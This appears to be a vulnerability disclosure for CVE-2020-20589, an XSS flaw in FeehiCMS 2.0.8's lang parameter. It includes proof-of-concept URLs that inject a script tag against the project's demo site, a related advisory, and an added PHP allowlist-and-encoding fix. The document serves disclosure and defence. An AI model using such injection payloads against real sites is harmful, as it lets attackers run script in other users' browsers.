CVE-2020-20589: XSS vulnerability in feehicms v2.0.8 · Issue #45 · liufee/cms

Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.0.8 allows remote attackers to run arbitrary code via the lang attribute of an HTML tag.


This is a Cross Site Scripting vulnerability that appears in two places (frontend and backend). When the lang is english"><script>alert(/xss/)</script>< or other JS code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:

POC example:
http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><
or

http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>

View any post and xss pop-up:

jscode:

Related news

GHSA-pwh3-3pcm-6vjh: FeehiCMS vulnerable to Cross Site Scripting

Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.0.8 allows remote attackers to run arbitrary code via the lang attribute of an HTML tag.
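
A server-side mitigation for the issue described above, as an added example that is not FeehiCMS code or the project's actual fix: the `lang` request parameter is checked against an allowlist before it is stored, and the value is encoded for the attribute context when the html tag is rendered. The function names and the list of language codes are assumptions; the sample inputs are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the languages FeehiCMS really supports are not listed on this page.
const SUPPORTED_LANGS = ['en-US', 'zh-CN', 'zh-TW'];
const DEFAULT_LANG = 'en-US';

/**
 * Validate the untrusted `lang` request parameter before it is stored.
 * Anything that is not an exact allowlist member falls back to the default,
 * so markup in the parameter never reaches the session, cookie or template.
 */
function resolveLang(mixed $raw): string
{
    if (!is_string($raw)) {          // ?lang[]=x arrives as an array
        return DEFAULT_LANG;
    }
    return in_array($raw, SUPPORTED_LANGS, true) ? $raw : DEFAULT_LANG;
}

/**
 * Render the opening <html> tag. The value is encoded for an attribute
 * context even though it was validated, so a value that bypasses
 * resolveLang() (older stored data, another code path) still cannot
 * close the attribute.
 */
function htmlOpenTag(string $lang): string
{
    $safe = htmlspecialchars($lang, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<html lang="' . $safe . '">';
}

// Constructed sample inputs: one valid code, the value from the report, one array.
$samples = [
    'zh-CN',
    'english"><script>alert(/xss/)</script><',
    ['nested'],
];
foreach ($samples as $raw) {
    // The second and third inputs are rejected and render as the default language.
    echo htmlOpenTag(resolveLang($raw)), PHP_EOL;
}

// Encoding alone, without the allowlist: quotes and angle brackets become
// entities, so the value stays inside the lang attribute.
echo htmlOpenTag('english"><script>alert(/xss/)</script><'), PHP_EOL;
```

Because the report shows the value being set on one request and rendered on later page views, both steps matter: validation on the request that sets the language, and encoding on every page that emits it.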
